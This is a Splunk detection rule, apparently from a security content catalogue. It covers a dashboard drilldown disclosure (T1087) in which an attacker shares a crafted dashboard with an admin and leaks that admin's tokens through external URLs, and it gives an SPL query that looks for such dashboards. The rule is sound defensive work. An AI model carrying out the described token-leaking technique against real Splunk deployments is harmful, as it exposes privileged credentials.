this search may reveal non malicious urls with environment variables used in organizations.

t1087
endpoint
splunk

Techniques

T1087

Sample rules

Splunk Account Discovery Drilldown Dashboard Disclosure

source: splunk
technicques:
- T1087

Description

Splunk drilldown vulnerability disclosure in Dashboard application that can potentially allow exposure of tokens from privilege users. An attacker can create dashboard and share it to privileged user (admin) and detokenize variables using external urls within dashboards drilldown function.

Detection logic


| rest splunk_server=local /servicesNS/-/-/data/ui/views 
| search eai:data="*$env:*" eai:data="*url*" eai:data="*options*" 
| rename author AS Author eai:acl.sharing AS Permissions eai:appName AS App eai:data AS "Dashboard XML" 
| fields Author Permissions App "Dashboard XML" 
| `splunk_account_discovery_drilldown_dashboard_disclosure_filter`